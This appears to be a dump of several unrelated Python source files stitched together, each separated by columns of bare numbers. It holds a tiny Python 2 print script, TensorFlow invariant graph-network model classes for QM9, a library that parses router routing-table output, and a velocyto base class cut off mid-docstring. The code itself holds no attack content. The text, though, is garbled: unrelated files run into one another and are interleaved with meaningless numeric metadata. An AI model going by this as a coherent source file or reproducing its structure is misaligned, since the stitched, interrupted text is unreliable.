53c7ce7ca7da62c9fbb3d991ae9e4e34d07ece5f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python2.7
print "run here: pack/big/b3.py"
def b3_fun(): print "function: pack/big/b3.py"
| 17.166667
| 46
| 0.679612
| 20
| 103
| 3.45
| 0.7
| 0.202899
| 0.26087
| 0.318841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054945
| 0.116505
| 103
| 5
| 47
| 20.6
| 0.703297
| 0.184466
| 0
| 0
| 0
| 0
| 0.578313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
6c88715fd2ea3799869313088b04841101e4ded7
| 21,402
|
py
|
Python
|
models/invariant_basic.py
|
JiaHe-yogurt/GNN
|
6b6dbc362591b4521e0b437d17ab09c1c879aa75
|
[
"Apache-2.0"
] | null | null | null |
models/invariant_basic.py
|
JiaHe-yogurt/GNN
|
6b6dbc362591b4521e0b437d17ab09c1c879aa75
|
[
"Apache-2.0"
] | null | null | null |
models/invariant_basic.py
|
JiaHe-yogurt/GNN
|
6b6dbc362591b4521e0b437d17ab09c1c879aa75
|
[
"Apache-2.0"
] | null | null | null |
from models.base_model import BaseModel
import layers.equivariant_linear as eq
import layers.layers as layers
import tensorflow.compat.v1 as tf
class invariant_basic(BaseModel):
def __init__(self, config, data):
super(invariant_basic, self).__init__(config)
self.data = data
self.build_model()
self.init_saver()
def build_model(self):
# here you build the tensorflow graph of any model you want and define the loss.
self.is_training = tf.placeholder(tf.bool)
self.labels = tf.placeholder(tf.int32, shape=[None])
## for A^3
if self.config.input_order == 3:
self.graphs1 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs3d[0].shape[0], None, None, None])
net3d = eq.equi_3_to_1('tri_equi0', self.data.train_graphs3d[0].shape[0], self.config.architecture3d[0], self.graphs1)
net3d = tf.nn.relu(net3d, name='rel0')
if self.config.network == 'gnn3':
self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None, None])
net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture2d[0],
self.graphs2)
net2d = tf.nn.relu(net2d, name='rel0')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
self.config.architecture2d[layer], net2d)
net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
net2d = layers.diag_offdiag_maxpool(net2d) # invariant max layer according to the invariant basis
net = tf.concat([net2d, net3d], axis=1)
elif self.config.network == 'gnn4':
self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None])
net1d = eq.equi_1_to_1('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture1d[0],
self.graphs2)
net1d = tf.nn.relu(net1d, name='rel0')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net1d = eq.equi_1_to_1('2d_equ%d' % layer, self.config.architecture1d[layer - 1],
self.config.architecture2d[layer], net1d)
net1d = tf.nn.relu(net1d, name='2d_rel%d' % layer)
net1d = tf.reduce_sum(net1d,axis=2)
net = tf.concat([net1d, net3d], axis=1)
## for A^4
elif self.config.input_order == 4:
self.graphs1 = tf.placeholder(tf.float32, shape=[None, 1, None, None, None, None])
net4d = eq.equi_4_to_1('four_equi0', 1, self.config.architecture[0], self.graphs1)
net4d = tf.nn.relu(net4d, name='rel0')
self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None, None])
net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture2d[0],
self.graphs2)
net2d = tf.nn.relu(net2d, name='rel0')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
self.config.architecture2d[layer], net2d)
net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
net2d = layers.diag_offdiag_maxpool(net2d) # invariant max layer according to the invariant basis
net = tf.concat([net2d, net4d], axis=1)
net = layers.fully_connected(net, self.config.fc[0], "full1")
net = layers.fully_connected(net, self.config.fc[1], "full2")
net = layers.fully_connected(net, self.config.num_classes, "full4", activation_fn=None) # original classification
# net = tf.reshape(layers.fully_connected(net, 1, "fully3", activation_fn=None),(-1,)) # regression
# define loss function
with tf.name_scope("loss"):
self.loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.labels, logits=net))
self.correct_predictions = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(net, 1, output_type=tf.int32), self.labels), tf.int32))
self.pred = tf.argmax(net, 1, output_type=tf.int32)
# self.loss = tf.reduce_sum(tf.losses.mean_squared_error(labels=self.labels, predictions=net)) # regression
# self.correct_predictions = tf.reduce_sum(tf.losses.mean_squared_error(labels=self.labels, predictions=net)) # regression
# self.pred = net
# get learning rate with decay every 20 epochs
learning_rate = self.get_learning_rate(self.global_step_tensor, self.data.train_size * 20)
# choose optimizer
if self.config.optimizer == 'momentum':
self.optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=self.config.momentum)
elif self.config.optimizer == 'adam':
self.optimizer = tf.train.AdamOptimizer(learning_rate)
# define train step
self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step_tensor)
def init_saver(self):
# here you initialize the tensorflow saver that will be used in saving the checkpoints.
self.saver = tf.train.Saver(max_to_keep=self.config.max_to_keep)
def get_learning_rate(self, global_step, decay_step):
"""
helper method to fit learning rat
:param global_step: current index into dataset, int
:param decay_step: decay step, float
:return: output: N x S x m x m tensor
"""
learning_rate = tf.train.exponential_decay(
self.config.learning_rate, # Base learning rate.
global_step * self.config.batch_size,
decay_step,
self.config.decay_rate, # Decay rate.
staircase=True)
learning_rate = tf.maximum(learning_rate, 0.00001)
return learning_rate
class QM9_invariant_basic(BaseModel):
def __init__(self, config, data):
super(QM9_invariant_basic, self).__init__(config)
self.data = data
self.build_model()
self.init_saver()
def build_model(self):
# here you build the tensorflow graph of any model you want and define the loss.
self.is_training = tf.placeholder(tf.bool)
self.labels = tf.placeholder(tf.int32, shape=[None,1])
## for A^3
self.graphs3 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs3d[0].shape[0], None, None, None])
net3d = eq.equi_3_to_1('tri_equi0', self.data.train_graphs3d[0].shape[0], self.config.architecture3d[0], self.graphs3)
net3d = tf.nn.relu(net3d, name='rel0')
self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs2d[0].shape[0], None, None])
net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs2d[0].shape[0], self.config.architecture2d[0],
self.graphs2)
net2d = tf.nn.relu(net2d, name='rel0')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
self.config.architecture2d[layer], net2d)
net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
net2d = layers.diag_offdiag_maxpool(net2d) # invariant max layer according to the invariant basis
self.graphs1 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs1d[0].shape[0], None])
net1d = eq.equi_1_to_1('1d_equ0', self.data.train_graphs1d[0].shape[0], self.config.architecture1d[0],
self.graphs1)
net1d = tf.nn.relu(net1d, name='rel1')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net1d = eq.equi_1_to_1('1d_equ%d' % layer, self.config.architecture1d[layer - 1],
self.config.architecture2d[layer], net1d)
net1d = tf.nn.relu(net1d, name='1d_rel%d' % layer)
net1d = tf.reduce_sum(net1d,axis=2)
net = tf.concat([net1d, net2d, net3d], axis=1)
net = layers.fully_connected(net, self.config.fc[0], "full1")
net = layers.fully_connected(net, self.config.fc[1], "full2")
net = layers.fully_connected(net, 1, "fully3", activation_fn=None) # regression
# define loss function
with tf.name_scope("loss"):
distances = tf.losses.absolute_difference(labels=self.labels, predictions=net,
reduction=tf.losses.Reduction.NONE)
self.loss = tf.reduce_sum(distances, axis=0)
self.correct_predictions = tf.reduce_sum(distances, axis=0)
self.pred = net
# get learning rate with decay every 20 epochs
learning_rate = self.get_learning_rate(self.global_step_tensor, self.data.train_size * self.config.decay_epoch)
# choose optimizer
if self.config.optimizer == 'momentum':
self.optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=self.config.momentum)
elif self.config.optimizer == 'adam':
self.optimizer = tf.train.AdamOptimizer(learning_rate)
# define train step
self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step_tensor)
def init_saver(self):
# here you initialize the tensorflow saver that will be used in saving the checkpoints.
self.saver = tf.train.Saver(max_to_keep=self.config.max_to_keep)
def get_learning_rate(self, global_step, decay_step):
"""
helper method to fit learning rat
:param global_step: current index into dataset, int
:param decay_step: decay step, float
:return: output: N x S x m x m tensor
"""
learning_rate = tf.train.exponential_decay(
self.config.learning_rate, # Base learning rate.
global_step * self.config.batch_size,
decay_step,
self.config.decay_rate, # Decay rate.
staircase=True)
learning_rate = tf.maximum(learning_rate, 0.00001)
return learning_rate
class QM9_invariant_basic2(BaseModel):
def __init__(self, config, data):
super(QM9_invariant_basic2, self).__init__(config)
self.data = data
self.build_model()
self.init_saver()
def build_model(self):
# here you build the tensorflow graph of any model you want and define the loss.
self.is_training = tf.placeholder(tf.bool)
self.labels = tf.placeholder(tf.int32, shape=[None,1])
## for A^3
self.graphs1 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs1d[0].shape[0], None])
self.graphs3 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs3d[0].shape[0], None, None, None])
net3d = eq.equi_3_to_1('tri_equi0', self.data.train_graphs3d[0].shape[0], self.config.architecture3d[0],
self.graphs3)
net3d = tf.nn.relu(net3d, name='rel3d')
self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs2d[0].shape[0], None, None])
net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs2d[0].shape[0], self.config.architecture2d[0],
self.graphs2)
net2d = tf.nn.relu(net2d, name='rel2d')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
self.config.architecture2d[layer], net2d)
net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
net122 = eq.equi_1_to_2('122', self.data.train_graphs1d[0].shape[0], self.config.architecture1d[0], self.graphs1)
net122 = tf.nn.relu(net122, name='rel122')
net2d = tf.concat([net2d, net122], axis=1)
net2d = layers.diag_offdiag_maxpool(net2d) # invariant max layer according to the invariant basis
net221 = eq.equi_2_to_1('221', 4, self.config.architecture2d[0], self.graphs2[:,2:, :,:])
net221 = tf.nn.relu(net221, name = 'relu221')
net1d = eq.equi_1_to_1('1d_equ0', self.data.train_graphs1d[0].shape[0], self.config.architecture1d[0],
self.graphs1)
net1d = tf.nn.relu(net1d, name='rel1')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net1d = eq.equi_1_to_1('1d_equ%d' % layer, self.config.architecture1d[layer - 1],
self.config.architecture2d[layer], net1d)
net1d = tf.nn.relu(net1d, name='1d_rel%d' % layer)
net1d = tf.concat([net1d, net221], axis=1)
net1d = tf.reduce_sum(net1d, axis=2)
net = tf.concat([net1d, net2d, net3d], axis=1)
net = layers.fully_connected(net, self.config.fc[0], "full1")
net = layers.fully_connected(net, self.config.fc[1], "full2")
net = layers.fully_connected(net, self.config.fc[1], "full3")
net = layers.fully_connected(net, 1, "fully4", activation_fn=None) # regression
# define loss function
with tf.name_scope("loss"):
distances = tf.losses.absolute_difference(labels=self.labels, predictions=net,
reduction=tf.losses.Reduction.NONE)
self.loss = tf.reduce_sum(distances, axis=0)
self.correct_predictions = tf.reduce_sum(distances, axis=0)
self.pred = net
# get learning rate with decay every 20 epochs
learning_rate = self.get_learning_rate(self.global_step_tensor, self.data.train_size * self.config.decay_epoch)
# choose optimizer
if self.config.optimizer == 'momentum':
self.optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=self.config.momentum)
elif self.config.optimizer == 'adam':
self.optimizer = tf.train.AdamOptimizer(learning_rate)
# define train step
self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step_tensor)
def init_saver(self):
# here you initialize the tensorflow saver that will be used in saving the checkpoints.
self.saver = tf.train.Saver(max_to_keep=self.config.max_to_keep)
def get_learning_rate(self, global_step, decay_step):
"""
helper method to fit learning rat
:param global_step: current index into dataset, int
:param decay_step: decay step, float
:return: output: N x S x m x m tensor
"""
learning_rate = tf.train.exponential_decay(
self.config.learning_rate, # Base learning rate.
global_step * self.config.batch_size,
decay_step,
self.config.decay_rate, # Decay rate.
staircase=True)
learning_rate = tf.maximum(learning_rate, 0.00001)
return learning_rate
class QM9_invariant_basic_gnn3(BaseModel):
def __init__(self, config, data):
super(QM9_invariant_basic_gnn3, self).__init__(config)
self.data = data
self.build_model()
self.init_saver()
def build_model(self):
# here you build the tensorflow graph of any model you want and define the loss.
self.is_training = tf.placeholder(tf.bool)
self.labels = tf.placeholder(tf.int32, shape=[None,1])
## for A^3
if self.config.input_order == 3:
self.graphs1 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs3d[0].shape[0], None, None, None])
net3d = eq.equi_3_to_1('tri_equi0', self.data.train_graphs3d[0].shape[0], self.config.architecture3d[0], self.graphs1)
net3d = tf.nn.relu(net3d, name='rel0')
if self.config.network == 'gnn3':
self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None, None])
net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture2d[0],
self.graphs2)
net2d = tf.nn.relu(net2d, name='rel0')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
self.config.architecture2d[layer], net2d)
net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
net2d = layers.diag_offdiag_maxpool(net2d) # invariant max layer according to the invariant basis
net = tf.concat([net2d, net3d], axis=1)
elif self.config.network == 'gnn4':
self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None])
net1d = eq.equi_1_to_1('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture1d[0],
self.graphs2)
net1d = tf.nn.relu(net1d, name='rel0')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net1d = eq.equi_1_to_1('2d_equ%d' % layer, self.config.architecture1d[layer - 1],
self.config.architecture2d[layer], net1d)
net1d = tf.nn.relu(net1d, name='2d_rel%d' % layer)
net1d = tf.reduce_sum(net1d,axis=2)
net = tf.concat([net1d, net3d], axis=1)
## for A^4
elif self.config.input_order == 4:
self.graphs1 = tf.placeholder(tf.float32, shape=[None, 1, None, None, None, None])
net4d = eq.equi_4_to_1('four_equi0', 1, self.config.architecture[0], self.graphs1)
net4d = tf.nn.relu(net4d, name='rel0')
self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None, None])
net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture2d[0],
self.graphs2)
net2d = tf.nn.relu(net2d, name='rel0')
for layer in range(1, len(self.config.architecture2d)): # architecture is # of features of each layers
net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
self.config.architecture2d[layer], net2d)
net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
net2d = layers.diag_offdiag_maxpool(net2d) # invariant max layer according to the invariant basis
net = tf.concat([net2d, net4d], axis=1)
net = layers.fully_connected(net, self.config.fc[0], "full1")
net = layers.fully_connected(net, self.config.fc[1], "full2")
net = layers.fully_connected(net, 1, "fully3", activation_fn=None) # regression
# define loss function
with tf.name_scope("loss"):
distances = tf.losses.absolute_difference(labels=self.labels, predictions=net,
reduction=tf.losses.Reduction.NONE)
self.loss = tf.reduce_sum(distances, axis=0)
self.correct_predictions = tf.reduce_sum(distances, axis=0)
self.pred = net
learning_rate = self.get_learning_rate(self.global_step_tensor, self.data.train_size * 20)
# choose optimizer
if self.config.optimizer == 'momentum':
self.optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=self.config.momentum)
elif self.config.optimizer == 'adam':
self.optimizer = tf.train.AdamOptimizer(learning_rate)
# define train step
self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step_tensor)
def init_saver(self):
# here you initialize the tensorflow saver that will be used in saving the checkpoints.
self.saver = tf.train.Saver(max_to_keep=self.config.max_to_keep)
def get_learning_rate(self, global_step, decay_step):
"""
helper method to fit learning rat
:param global_step: current index into dataset, int
:param decay_step: decay step, float
:return: output: N x S x m x m tensor
"""
learning_rate = tf.train.exponential_decay(
self.config.learning_rate, # Base learning rate.
global_step * self.config.batch_size,
decay_step,
self.config.decay_rate, # Decay rate.
staircase=True)
learning_rate = tf.maximum(learning_rate, 0.00001)
return learning_rate
| 55.302326
| 142
| 0.620783
| 2,814
| 21,402
| 4.571429
| 0.074272
| 0.077736
| 0.033349
| 0.027363
| 0.962764
| 0.962764
| 0.955924
| 0.951803
| 0.951803
| 0.931748
| 0
| 0.040698
| 0.264087
| 21,402
| 386
| 143
| 55.445596
| 0.776063
| 0.141576
| 0
| 0.890511
| 0
| 0
| 0.028668
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058394
| false
| 0
| 0.014599
| 0
| 0.10219
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
66bb6392fe5b37f8bf8b51fb7e2dd3bda8ef4d01
| 12,896
|
py
|
Python
|
commonLib/lib_routetable.py
|
NobuyukiInoue/pyReadShowIpRoute
|
3c83a3ede01b4fcb7fc801dae03366a694a244ab
|
[
"MIT"
] | null | null | null |
commonLib/lib_routetable.py
|
NobuyukiInoue/pyReadShowIpRoute
|
3c83a3ede01b4fcb7fc801dae03366a694a244ab
|
[
"MIT"
] | null | null | null |
commonLib/lib_routetable.py
|
NobuyukiInoue/pyReadShowIpRoute
|
3c83a3ede01b4fcb7fc801dae03366a694a244ab
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
from typing import List, Dict, Tuple
from . import lib_common
from . import lib_contents_to_list
def model_judgment(filename_path: str, contents: List[str]) -> str:
"""
model judgment.
"""
if contents is None:
return None, None, None
prompt_char = ["#", "> ", ">"]
enable_perfect_match = True
# for Cisco
target_command = "show ip route vrf *"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if len(contents_target_command) > 1 and"Load for five secs:" in contents_target_command[1]:
for line in contents_target_command:
if "Routing Table:" in line:
return "cisco_vrf"
return "cisco"
# for IP8800
target_command = "show ip route vrf all"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if len(contents_target_command) > 1 and "Date " in contents_target_command[1]:
for line in contents_target_command:
if "VRF:" in line:
return "ip8800_vrf"
return "ip8800"
# Cisco or IP880 or HPE Aruba
target_command = "show ip route"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if len(contents_target_command) > 1:
if "Load for five secs:" in contents_target_command[1] \
or "Codes:" in contents_target_command[1]:
# for Cisco
for line in contents_target_command:
if "Routing Table:" in line:
return "cisco_vrf"
return "cisco"
if "Date " in contents_target_command[1]:
# for IP8800
for line in contents_target_command:
if "VRF:" in line:
return "ip8800_vrf"
return "ip8800"
else:
# for HPE Aruba
for line in contents_target_command:
if "IP Route Entries" in line:
return "aruba"
# for Junos
target_command = "show route terse"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if len(contents_target_command) > 0:
for line in contents_target_command:
if "A V Destination" in line:
return "junos"
# for NEC QX
target_command = "display ip routing-table"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if len(contents_target_command) > 1 and "Routing Tables:" in contents_target_command[1]:
return "qx"
return None
def get_ip_route_result(filename_path: str, modelName: str, contents: List[str], enable_print: bool, enable_exit: bool) -> Tuple[List[List[str]], str, List[str]]:
prompt_char = ["#", "> ", ">"]
enable_perfect_match = True
table = None
if modelName == "cisco":
target_command = "show ip route"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if enable_print:
# Print execution result of target_command.
lib_common.print_contents_target_command(filename_path, contents_target_command)
# Store the execution result of "show ip route vrf *" in the list.
table = lib_contents_to_list.for_Cisco(filename_path, contents_target_command, enable_exit)
elif modelName == "cisco_vrf":
target_command = "show ip route vrf *"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if enable_print:
# Print execution result of target_command.
lib_common.print_contents_target_command(filename_path, contents_target_command)
# Store the execution result of "show ip route vrf *" in the list.
table = lib_contents_to_list.for_Cisco(filename_path, contents_target_command, enable_exit)
elif modelName == "ip8800":
target_command = "show ip route"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if enable_print:
# Print execution result of target_command.
lib_common.print_contents_target_command(filename_path, contents_target_command)
# Store the execution result of "show ip route vrf all" in the list.
table = lib_contents_to_list.for_IP8800(filename_path, contents_target_command, enable_exit)
elif modelName == "ip8800_vrf":
target_command = "show ip route vrf all"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if enable_print:
# Print execution result of target_command.
lib_common.print_contents_target_command(filename_path, contents_target_command)
# Store the execution result of "show ip route vrf all" in the list.
table = lib_contents_to_list.for_IP8800(filename_path, contents_target_command, enable_exit)
elif modelName == "junos":
target_command = "show route terse"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if enable_print:
# Print execution result of target_command.
lib_common.print_contents_target_command(filename_path, contents_target_command)
# Store the execution result of "show route terse" in the list.
table = lib_contents_to_list.for_Junos(filename_path, contents_target_command, enable_exit)
elif modelName == "aruba":
target_command = "show ip route"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if enable_print:
# Print execution result of target_command.
lib_common.print_contents_target_command(filename_path, contents_target_command)
# Store the execution result of "show ip route" in the list.
table = lib_contents_to_list.for_Aruba(filename_path, contents_target_command, enable_exit)
elif modelName == "qx":
target_command = "display ip routing-table"
contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
if enable_print:
# Print execution result of target_command.
lib_common.print_contents_target_command(filename_path, contents_target_command)
# Store the execution result of "show ip route" in the list.
table = lib_contents_to_list.for_QX(filename_path, contents_target_command, enable_exit)
else:
print("modelName {0} not defined.".format(modelName))
return None, None, None
return table, target_command, contents_target_command
def print_table(modelName: str, filename_path: str, table: List[List[str]], enable_sort: bool):
"""
print table
table[vrf_id] fields:
table[vrf_id][0] decimal of destinaton ipaddr.
table[vrf_id][1] destination ipaddr.
table[vrf_id][2] [distance/metric]
table[vrf_id][3] next hop.
table[vrf_id][4] elapsed time.
table[vrf_id][5] Output interface.
table[vrf_id][6] Codes.
"""
for key, value in table.items():
if enable_sort:
value.sort()
print("##----------------------------------------------------------------------##\n"
"## {0}\n"
"## ModelName = {1}\n" \
"## vrf = {2}\n"
"## {3} records\n"
"##----------------------------------------------------------------------##"
.format(filename_path, modelName, key, len(value)))
# print("{0:20}{1:14}{2:20}{3:10}{4:24}{5}".format("Destination", "Metric", "NextHop", "Expire", "Interface", "Protocol"))
print("{0:20}{1:14}{2:20}{3:24}{4}".format("Destination", "Metric", "NextHop", "Interface", "Protocol"))
for row in value:
if not "/" in row[1] and not "/" in row[2] and row[3] != "via":
print("Format Error!!!")
# print(row)
# print("{0: <12}{1:20}{2:14}{3:20}{4:10}{5:24}{6}".format(row[0], row[1], row[2], row[3], row[4], row[5], row[6]))
# print("{0:20}{1:14}{2:20}{3:10}{4:24}{5}".format(row[1], row[2], row[3], row[4], row[5], row[6]))
print("{0:20}{1:14}{2:20}{3:24}{4}".format(row[1], row[2], row[3], row[5], row[6]))
print()
def save_contents(filename_path: str, target_directory: str, target_command: str, contents: List[str]):
# remove prohibited characters.
target_command = remove_prohibited_characters(target_command).replace(" ", "_")
original_filename = filename_path.split("/")[-1]
pos_bar = original_filename.rfind("_")
if pos_bar < 0:
print("save_contents() rfind(\"_\") error!! ... {0}".format(original_filename))
exit(0)
dirname = target_directory + "/" + original_filename[:pos_bar]
if not os.path.exists(dirname):
os.makedirs(dirname)
pos_extension = original_filename.rfind(".")
if pos_extension < 0:
print("save_contents() rfind(\".\") error!! ... {0}".format(original_filename))
exit(0)
newfilename_path = dirname + "/" + original_filename[:pos_extension] + "_" + target_command + original_filename[pos_extension:]
newfilename_path = newfilename_path.replace("//", "/")
f = open(newfilename_path , mode="wt")
f.writelines(contents)
f.close
print("{0} was saved.".format(newfilename_path))
def save_table(modelName: str, filename_path: str, table: List[List[str]], target_directory: str, enable_sort: bool):
"""
save table
"""
for key, value in table.items():
if enable_sort:
value.sort()
resultStr = "##----------------------------------------------------------------------##\n" \
"## {0}\n" \
"## ModelName = {1}\n" \
"## vrf = {2}\n" \
"## {3} records\n" \
"##----------------------------------------------------------------------##\n" \
.format(filename_path, modelName, key, len(value))
# resultStr += "{0:20}{1:14}{2:20}{3:10}{4:24}{5}\n".format("Destination", "Metric", "NextHop", "Expire", "Interface", "Protocol")
resultStr += "{0:20}{1:14}{2:20}{3:24}{4}\n".format("Destination", "Metric", "NextHop", "Interface", "Protocol")
for row in value:
if not "/" in row[1] and not "/" in row[2] and row[3] != "via":
print("Format Error!!!")
exit(0)
# resultStr += "{0:20}{1:14}{2:20}{3:10}{4:24}{5}\n".format(row[1], row[2], row[3], row[4], row[5], row[6])
resultStr += "{0:20}{1:14}{2:20}{3:24}{4}\n".format(row[1], row[2], row[3], row[5], row[6])
original_filename = filename_path.split("/")[-1]
pos_bar = original_filename.rfind("_")
if pos_bar < 0:
print("save_table() rfind(\"_\") error!! ... {0}".format(original_filename))
exit(0)
dirname = target_directory + "/" + original_filename[:pos_bar]
if not os.path.exists(dirname):
os.makedirs(dirname)
pos_extension = original_filename.rfind(".")
if pos_extension < 0:
print("save_table() rfind(\".\") error!! ... {0}".format(original_filename))
exit(0)
newfilename_path = dirname + "/" + original_filename[:pos_extension] + "_vrf_" + key + original_filename[pos_extension:]
newfilename_path = newfilename_path.replace("//", "/")
try:
f = open(newfilename_path, mode="wt")
f.writelines(resultStr)
f.close
print("table[{0}] was saved to {1}".format(key, newfilename_path))
except Exception as e:
print("////////////////////////////////\n"
"Error!!!\n"
"////////////////////////////////\n"
"{0}\n\n".format(e))
print("newfilename_path = {0}".format(newfilename_path))
print("resultStr = \n{0}".format(resultStr))
exit(0)
def remove_prohibited_characters(prompt_preStr: str) -> str:
"""
Remove prohibited characters.
"""
prohibited_chars = ["[", "]", ">", "#", "%", "$", ":", ";", "~", "*", "."]
for ch in prohibited_chars:
prompt_preStr = prompt_preStr.replace(ch, "")
return prompt_preStr
| 44.164384
| 162
| 0.613368
| 1,584
| 12,896
| 4.729798
| 0.094697
| 0.171783
| 0.210224
| 0.055793
| 0.811399
| 0.792579
| 0.778297
| 0.745996
| 0.725841
| 0.681794
| 0
| 0.026777
| 0.238368
| 12,896
| 291
| 163
| 44.316151
| 0.736001
| 0.142215
| 0
| 0.585106
| 0
| 0
| 0.138757
| 0.044059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031915
| false
| 0
| 0.021277
| 0
| 0.138298
| 0.170213
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
66df0b7898c462edb013846fc2caa343bcd0ac4a
| 63,746
|
py
|
Python
|
velocyto/logic.py
|
jamestwebber/velocyto.py
|
beba566bf82a9cb4024ed913fd3feb7bfde956a5
|
[
"BSD-2-Clause"
] | null | null | null |
velocyto/logic.py
|
jamestwebber/velocyto.py
|
beba566bf82a9cb4024ed913fd3feb7bfde956a5
|
[
"BSD-2-Clause"
] | null | null | null |
velocyto/logic.py
|
jamestwebber/velocyto.py
|
beba566bf82a9cb4024ed913fd3feb7bfde956a5
|
[
"BSD-2-Clause"
] | null | null | null |
from typing import *
import velocyto as vcy
import numpy as np
import abc
class Logic(metaclass=abc.ABCMeta):
"""Base class from wich all the logics should inherit
"""
def __init__(self) -> None:
self.name = "Logic"
@property
def layers(self) -> List[str]: # This should be overridden if a different set of layers is desired
return []
@property
def stranded(self) -> bool:
return True
@property
def perform_validation_markup(self) -> bool:
return True
@property
def accept_discordant(self) -> bool:
return False
@abc.abstractmethod # This needs to be overridden
def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> Union[None, int]:
"""This methods will have to countain the core operations of the logic to attribute a molecule to one of the cathergories
